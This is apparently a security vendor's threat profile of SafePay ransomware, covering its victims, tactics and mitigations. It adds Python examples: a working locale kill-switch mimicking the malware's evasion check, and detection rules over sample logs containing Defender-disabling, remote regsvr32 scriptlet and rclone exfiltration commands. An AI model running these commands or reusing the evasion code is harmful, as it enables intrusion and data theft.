SafePay is a ransomware group that first emerged around September 2024. Its mode of operation is quite straightforward (and dangerous): it encrypts victims' files and demands payment in cryptocurrency to restore access. But that’s not all. It also steals sensitive information and threatens to publish it on the dark web if the ransom isn’t paid—a tactic known as double extortion, which has become increasingly common in these types of attacks.
Unlike many other ransomware groups that use the Ransomware-as-a-Service (RaaS) model—where external affiliates distribute the malware in exchange for a commission—SafePay appears to operate independently. In other words, the same team behind the ransomware is responsible for designing, deploying, and executing the attacks without intermediaries. This suggests a more controlled and organized approach, likely intended to maintain full control over victims and profits.
SafePay Ransomware Data Leak Site (DLS)
Who Is Behind SafePay Ransomware?
SafePay burst onto the ransomware scene in early 2025, and it made quite an entrance. Although it had been active since late 2024, it was a virtually unknown name until then; within a matter of months it became one of the most aggressive and active groups around. Their attacks have multiplied rapidly, and according to the group's own leak site, they have already claimed responsibility for over 265 victims across multiple countries.
Interestingly, in 2024 they had only attacked about 20 organizations. In 2025 their activity surged alarmingly, showing that they are evolving quickly and have both the resources and the intent to scale their operations globally.
If there were still any doubts about the level of threat they pose, they recently took things up a notch: SafePay issued a serious warning to Ingram Micro, one of the world’s largest technology distributors. The group claims to have stolen 3.5 terabytes of confidential data during a cyberattack that occurred early last month. They are now threatening to leak all that sensitive information unless the company complies with their demands.
Moves like this show that SafePay isn’t just after money—they’re also aiming to create media pressure and public impact. Without a doubt, they are positioning themselves as a threat that goes beyond opportunistic attacks, with a much more calculated and damaging strategy.
Who Does SafePay Ransomware Target?
Since its emergence, SafePay has attacked over 250 organizations worldwide—and there are no signs of them slowing down. Their targets span various regions and industries, but the focus is clear: developed economies and critical sectors.
Top Affected Countries
The most heavily hit country by SafePay’s attacks is by far the United States, with at least 103 confirmed victims, accounting for nearly 40% of the known total. Germany follows with 47 cases, then others like the United Kingdom, Australia, Canada, and several nations in Latin America and Asia.
This geographical pattern clearly shows that SafePay is primarily targeting North America and Western Europe, where organizations tend to have more resources—and therefore, more to lose.
Top 10 countries targeted by SafePay Ransomware (Source: SOCRadar)
A particularly concerning fact is that Mexico ranks among the top 10 countries most targeted by this ransomware. This highlights an alarming trend: cybercriminals are no longer focusing exclusively on global powers, but are also turning their attention to emerging economies with increasingly active digital infrastructures—and, in many cases, uneven levels of cybersecurity. This makes Mexico an attractive target for this type of threat.
Read more: Ransomware in Mexico: Cyberattacks Cause Major IT Sector Losses
What Types of Industries Does SafePay Target?
Interestingly, SafePay doesn't limit itself to a single sector. It has impacted a wide range of industries, with a clear focus on those that handle large volumes of data, critical infrastructure, or essential services. The most targeted sectors include:
- Manufacturing
- Technology
- Education
- Healthcare
- Business Services
In addition, companies in transportation and logistics, finance, agriculture, utilities, and even consumer services have also been affected.
This diversity suggests that SafePay isn’t aiming at a specific vertical, but rather at organizations likely to feel pressured into paying quickly to avoid serious disruptions or data leaks.
Who Doesn’t SafePay Ransomware Attack?
One revealing aspect is that SafePay intentionally avoids certain countries, especially Russia, Belarus, Ukraine and other former Soviet republics in the Commonwealth of Independent States (CIS) region.
How do they do it? The malware checks the system's language before executing. If it detects that the operating system is set to one of the following languages, it exits without causing harm:
- Armenian
- Azerbaijani (Cyrillic)
- Belarusian
- Georgian
- Kazakh
- Russian
- Ukrainian
This behavior, quite common among ransomware originating from Russia or former Soviet states, suggests that SafePay may have ties to those regions—or at least aims to avoid local conflicts or retaliation.
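To show what such a language check looks like in practice, here is an added example (illustrative code written for this article, not SafePay's own): it implements the exclusion list above on top of Windows locale identifiers (LCIDs). The primary language sits in the low 10 bits of an LCID and the regional sub-language in the next 6 bits, which is what lets the check exclude Azerbaijani only in its Cyrillic form (LCID 0x082C) while leaving Latin-script Azerbaijani (0x042C) alone. Which exact Windows API SafePay queries is not stated on the page; reading the system and user UI language via kernel32 is an assumption used here.

```python
"""Added example: a Windows locale kill switch of the kind described above.
Illustrative code, not SafePay's own; which API the malware actually calls is not
stated in the article, so reading the UI language from kernel32 is an assumption."""
import sys

# Windows primary language identifiers (low 10 bits of an LCID / LANGID).
LANG_ARMENIAN = 0x2B
LANG_AZERI = 0x2C
LANG_BELARUSIAN = 0x23
LANG_GEORGIAN = 0x37
LANG_KAZAK = 0x3F
LANG_RUSSIAN = 0x19
LANG_UKRAINIAN = 0x22

# Sub-language that distinguishes az-Cyrl-AZ (0x082C) from az-Latn-AZ (0x042C).
SUBLANG_AZERI_CYRILLIC = 0x02

# Languages excluded regardless of regional variant.
EXCLUDED_PRIMARY = {LANG_ARMENIAN, LANG_BELARUSIAN, LANG_GEORGIAN,
                    LANG_KAZAK, LANG_RUSSIAN, LANG_UKRAINIAN}


def primary_lang(lcid):
    """PRIMARYLANGID(): the low 10 bits of a locale identifier."""
    return lcid & 0x3FF


def sub_lang(lcid):
    """SUBLANGID(): the 6 bits above the primary language."""
    return (lcid >> 10) & 0x3F


def is_excluded_locale(lcid):
    """True if this locale is on the exclusion list (Azerbaijani only in Cyrillic)."""
    p = primary_lang(lcid)
    if p in EXCLUDED_PRIMARY:
        return True
    return p == LANG_AZERI and sub_lang(lcid) == SUBLANG_AZERI_CYRILLIC


def should_abort(lcids):
    """The kill switch: abort if any observed locale is excluded."""
    return any(is_excluded_locale(l) for l in lcids)


def current_locales():
    """On Windows, read the system and user UI language IDs; elsewhere return []."""
    if sys.platform != "win32":
        return []
    import ctypes
    k32 = ctypes.windll.kernel32
    return [k32.GetSystemDefaultUILanguage(), k32.GetUserDefaultUILanguage()]


if __name__ == "__main__":
    # Constructed sample: an en-US user on a system whose UI language is Ukrainian.
    print("abort:", should_abort([0x0409, 0x0422]))
    print("this host:", [hex(l) for l in current_locales()])
```

Checks of this kind are easy to fool and just as easy for defenders to confuse: the result depends on which of the several Windows language settings the sample reads, and a host whose UI language is English but whose user has a Russian layout may or may not be skipped depending on that choice.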
How Does SafePay Ransomware Attack? Tactics, Techniques, and What You Need to Know
The group behind SafePay Ransomware doesn’t improvise. Their attacks are well-planned, combining traditional tactics with advanced techniques to infiltrate systems, move through networks, steal information, and ultimately encrypt files.
While many of their strategies are shared with other ransomware groups, SafePay has certain traits that make it harder to detect and stop. Here's a clear yet technically detailed breakdown of how SafePay operates, step by step:
Initial Access: How SafePay Gets into Networks
SafePay typically conducts prior reconnaissance, identifying vulnerabilities and gathering valid access credentials.
- They often purchase stolen credentials on dark web markets or harvest them using infostealer malware.
- These credentials are used to access exposed services such as unprotected VPN portals or poorly configured RDP connections.
- They also exploit known vulnerabilities in unpatched software or devices.
A growing tactic involves phishing combined with vishing. They send malicious emails posing as tech support, and if there’s no response, they may follow up with phone calls to convince users to open a file or grant remote access. In some cases, they’ve even used platforms like Microsoft Teams for real-time interaction.
Attack Execution: Scripts, Native Tools, and Stealth
Once inside, SafePay's team moves quickly, deploying scripts and payloads to gain control of the environment. They use:
- PowerShell scripts or .bat files to automate the steps of the intrusion.
- Native system tools like cmd.exe or regsvr32 to avoid detection (a method known as Living off the Land).
- Malicious DLLs disguised as legitimate Windows components.
The ransomware itself is modular and configurable, allowing them to tailor each attack: deciding which folders to encrypt, what to exclude, or even self-destructing after execution.
Persistence: How They Maintain Access
SafePay ensures long-term access by:
- Installing legitimate remote-control tools like ConnectWise ScreenConnect, which can go unnoticed if installed with valid credentials.
- In some attacks, using custom malware such as QDoor, a lightweight remote access tool that allows hidden command execution or tunneling.
- Modifying Windows Registry entries to ensure their processes start automatically upon reboot.
Privilege Escalation: From Regular Users to Admins
To fully control the system, SafePay seeks elevated privileges:
- They use tools like Mimikatz to extract passwords and hashes directly from system memory.
- They exploit common bad practices like password reuse, weak policies, or admin accounts lacking multi-factor authentication.
- They have also bypassed UAC (User Account Control) prompts to silently gain administrative rights.
Defense Evasion: Dodging Antivirus and Detection
SafePay puts significant effort into evading security tools:
- They disable Microsoft Defender and other antivirus software via administrative commands or Group Policy modifications.
- They add exclusions for specific folders and remove security software when they have sufficient privileges.
- They use techniques like dynamic loading, obfuscation, string encryption, and geofencing to avoid detection.
Credential Access: Stealing to Expand Control
Throughout the attack, SafePay continues collecting credentials to increase their control:
- In addition to Mimikatz, they search for saved credentials in browsers, RDP clients, or management software.
- These stolen credentials are then used to disable defenses, access more systems, and prepare for the final encryption phase.
Lateral Movement: Silent Expansion Across the Network
Once they have privileged access, the attackers spread laterally through the network stealthily:
- They connect to other systems using RDP, shared folders, or remote commands.
- Tools like ShareFinder help them discover important servers, shared drives, or critical assets worth encrypting.
- They continue using PowerShell, batch scripts, and native Windows tools to stay under the radar.
This lateral movement allows them to take control of key infrastructure, such as backup servers or virtualization systems, before launching the main attack.
Data Exfiltration: Silent Theft Before the Disaster
SafePay doesn't just encrypt files; it also steals large amounts of sensitive data. In fact, they often spend several days navigating the network and copying information:
- They locate critical files such as databases, financial documents, and legal records.
- These files are compressed using tools like WinRAR and transferred using FileZilla or Rclone to servers under their control.
- Often, they exfiltrate hundreds of gigabytes without being detected, because these tools use ordinary file-transfer and cloud-storage protocols that blend in with legitimate outbound traffic.
The stolen data is then used in the second phase of the attack: extortion.
Simplified Attack Chain Diagram of SafePay Ransomware
Final Impact: Encryption, Ransom Note, and Public Threat
When everything is set, SafePay launches the final phase:
- They encrypt files and change their extensions to .safepay.
- A ransom note (typically named readme_safepay.txt) is left on the system, providing instructions to contact the group via a portal hosted on the dark web, usually on The Open Network (TON).
- They threaten to publish the stolen data if the ransom is not paid.
Additionally, their leak site—known as the DLS (Data Leak Site)—is regularly updated with information about victims who refused to pay, increasing the pressure on targeted companies.
SafePay Ransomware Ransom Note
Read more: Loki Locker Ransomware: What It Is and How to Protect Yourself
How to Protect Against SafePay Ransomware: Effective Mitigation Tactics
Facing a threat like SafePay Ransomware is no easy task. This group is sophisticated, stealthy, and persistent. That’s why protecting your company requires a layered approach—one that combines technology, best practices, and user awareness.
There’s no silver bullet, but there are concrete measures that can drastically reduce the risk of an attack and minimize the impact if one occurs.
Here’s what you can do to defend against SafePay—and how solutions from TecnetOne can help you stay one step ahead.
Strengthen Access: The Basics, Done Right
One of SafePay's favorite entry points is unsecured remote access. Securing your access points is the logical first step:
- Use strong, unique passwords for all accounts, especially admin accounts.
- Enable multi-factor authentication (MFA) for everything: VPN, RDP, admin panels, etc.
- Restrict remote access to essentials only. If it's not absolutely necessary, disable it.
- Conduct regular audits and remove unused accounts.
At TecnetOne, we help implement secure access policies and monitor user behavior in real time through our SOC as a Service (Security Operations Center), which acts as an active barrier against unauthorized access.
Patching and Hardening Systems
Many SafePay attacks exploit known vulnerabilities, most of which already have patches but are often overlooked due to lack of time or resources.
- Keep your VPNs, firewalls, servers, and public-facing software updated.
- Disable unused services like RDP if they aren't absolutely necessary.
Monitor Credentials and Suspicious Behavior
SafePay thrives on stealing valid credentials. Early detection of misuse can stop the spread:
- Use EDR tools to detect suspicious activities, such as Mimikatz execution or access to LSASS.
- Watch for unusual logins, like valid credentials being used from unfamiliar IPs or geographic locations.
- Monitor for lateral movement signals, such as administrative share access or mass remote executions.
TecnetOne’s SOC monitors these behavioral patterns 24/7, helping detect attacks in their early stages before they escalate.
Control Use of Abusable Built-in Tools
Many of the tools SafePay uses come pre-installed with Windows. It's important to manage their use:
- Restrict PowerShell, regsvr32, cmd.exe and similar built-ins for users and systems that don't need them (application control, PowerShell Constrained Language Mode), and log their use everywhere else.
- Set alerts for the execution of batch scripts or uncommon tools.
- Monitor the use of remote management software like ScreenConnect. Unauthorized installations should immediately trigger alerts.
Be Prepared to Detect Typical Ransomware Behavior
Ransomware attacks leave signals, if you know where to look. Some preventive steps:
- Disable Windows Script Host if it's not needed.
- Use Group Policy or file-screening rules (for example, Windows File Server Resource Manager) to block or alert on the creation of files with suspicious extensions like .safepay.
- Detect sudden mass file changes, WinRAR usage, or unusual transfers via Rclone or FileZilla.
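As a concrete illustration of the monitoring described in the last three sections, here is an added example (written for this article; it is not TecnetOne's tooling or anything SafePay ships) that runs a handful of detection rules over constructed Windows process, process-access and file-creation telemetry. The field names follow Sysmon conventions (Image, CommandLine, SourceImage, TargetImage, TargetFilename), but the records, host names, users and the 198.51.100.7 address are invented. The rules map to behaviours the attack chain above describes: Defender being disabled or given exclusions, regsvr32 pulling a remote scriptlet, a non-system binary opening LSASS, ShareFinder discovery, ScreenConnect installs, Rclone/FileZilla/WinRAR execution, and the .safepay and readme_safepay.txt artifacts.

```python
"""Added example: simple rule-based detection over constructed Sysmon-style telemetry.
Illustrative code for this article, not a product or SafePay's own tooling."""
import re

# Constructed sample telemetry. "type" mirrors Sysmon event classes:
# process_create (EID 1), process_access (EID 10), file_create (EID 11).
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS01", "user": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "process_create", "host": "WS01", "user": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Add-MpPreference -ExclusionPath C:\ProgramData\tmp"},
    {"type": "process_create", "host": "WS01", "user": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"},
    {"type": "process_access", "host": "SRV01", "user": "CORP\\jdoe",
     "SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"type": "process_create", "host": "SRV01", "user": "CORP\\svc_backup",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass -c Invoke-ShareFinder -CheckShareAccess"},
    {"type": "process_create", "host": "SRV01", "user": "CORP\\svc_backup",
     "Image": r"C:\ProgramData\rc\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Finance remote:backup --transfers 16"},
    {"type": "file_create", "host": "FS01", "user": "CORP\\svc_backup",
     "Image": r"C:\ProgramData\upd.exe",
     "TargetFilename": r"D:\Shares\Legal\contract.docx.safepay"},
    # Benign noise: an admin querying Defender status, Explorer writing a document.
    {"type": "process_create", "host": "WS02", "user": "CORP\\admin1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-MpComputerStatus"},
    {"type": "file_create", "host": "WS02", "user": "CORP\\admin1",
     "Image": r"C:\Windows\explorer.exe", "TargetFilename": r"C:\Users\admin1\report.docx"},
]


def _ci(pattern, field):
    """Build a case-insensitive regex predicate over one event field."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda e: bool(rx.search(e.get(field, "")))


# (rule name, event type it applies to, predicate). Predicates only run on their type.
RULES = [
    ("defender_tamper", "process_create",
     _ci(r"Set-MpPreference\s+-Disable|Add-MpPreference\s+-Exclusion|"
         r"sc(\.exe)?\s+(stop|config)\s+windefend", "CommandLine")),
    ("regsvr32_remote_scriptlet", "process_create",
     lambda e: e["Image"].lower().endswith("regsvr32.exe")
     and bool(re.search(r"/i:https?://|scrobj\.dll", e["CommandLine"], re.I))),
    # Allow-listing System32 is a simplification: tools like rundll32 live there too.
    ("lsass_access", "process_access",
     lambda e: e["TargetImage"].lower().endswith(r"\lsass.exe")
     and not e["SourceImage"].lower().startswith(r"c:\windows\system32")),
    ("share_discovery", "process_create", _ci(r"Invoke-ShareFinder|SharpShares", "CommandLine")),
    ("remote_mgmt_install", "process_create", _ci(r"ScreenConnect|ConnectWiseControl", "Image")),
    ("exfil_tooling", "process_create", _ci(r"\\(rclone|filezilla|winrar|rar)\.exe$", "Image")),
    ("safepay_artifact", "file_create", _ci(r"\.safepay$|readme_safepay\.txt$", "TargetFilename")),
]


def analyze(events):
    """Return one alert per matching (rule, event), in input order."""
    alerts = []
    for e in events:
        for name, etype, pred in RULES:
            if e["type"] == etype and pred(e):
                alerts.append({"rule": name, "host": e["host"], "user": e["user"],
                               "detail": e.get("CommandLine") or e.get("TargetFilename")
                               or e.get("SourceImage")})
    return alerts


def hosts_with_chain(alerts, min_rules=2):
    """Hosts where several distinct rules fired: a stronger signal than any single hit."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["host"], set()).add(a["rule"])
    return sorted(h for h, r in seen.items() if len(r) >= min_rules)


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for a in found:
        print(f'[{a["rule"]}] {a["host"]} {a["user"]}: {a["detail"]}')
    print("hosts with multi-stage activity:", hosts_with_chain(found))
```

The per-host correlation is the part worth copying: a single Rclone execution or one Add-MpPreference call is noisy on its own, but Defender tampering followed by a LOLBin download on the same host, or LSASS access followed by share discovery and bulk transfer, is exactly the sequence the attack chain above describes, and escalating on the combination keeps the individual rules broad without drowning the SOC in false positives.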
Secure Backups and Fast Recovery
Having backups is essential, but not just any backup will do.
- Perform regular, automated, offline backups.
- Isolate your backup infrastructure from the rest of the network to prevent encryption by ransomware.
- Ensure backups cannot be deleted or tampered with by attackers.
- Test your recovery process regularly to ensure full and fast restoration.
This is where TecnetProtect Backup comes in—our solution built on Acronis technology, one of the world’s most robust data protection platforms.
With TecnetProtect, you get automated, encrypted, and isolated backups, and you can restore entire systems in minutes—without losing critical data.
User Training and Response Preparedness
Humans remain the "weakest link," but they can also become your first line of defense.
- Train your team to recognize phishing emails, vishing calls, and suspicious messages in corporate chats.
- Conduct regular simulations: send fake phishing emails and measure who takes the bait.
- Establish and communicate a clear incident response plan. Everyone should know what to do if something goes wrong: isolate machines, contact IT, avoid interacting with attackers, etc.
Conclusion
Protecting against SafePay ransomware isn’t about luck—it’s about preparation. With a layered approach that includes strong technical controls, reliable backups, continuous monitoring, and ongoing education, you can drastically reduce your risk and be ready to respond if something happens.
And if you don’t have a strong internal cybersecurity team, don’t worry—TecnetOne offers comprehensive, managed solutions that support you every step of the way, from prevention to rapid incident response.
Want to assess if your company is ready to face a threat like SafePay?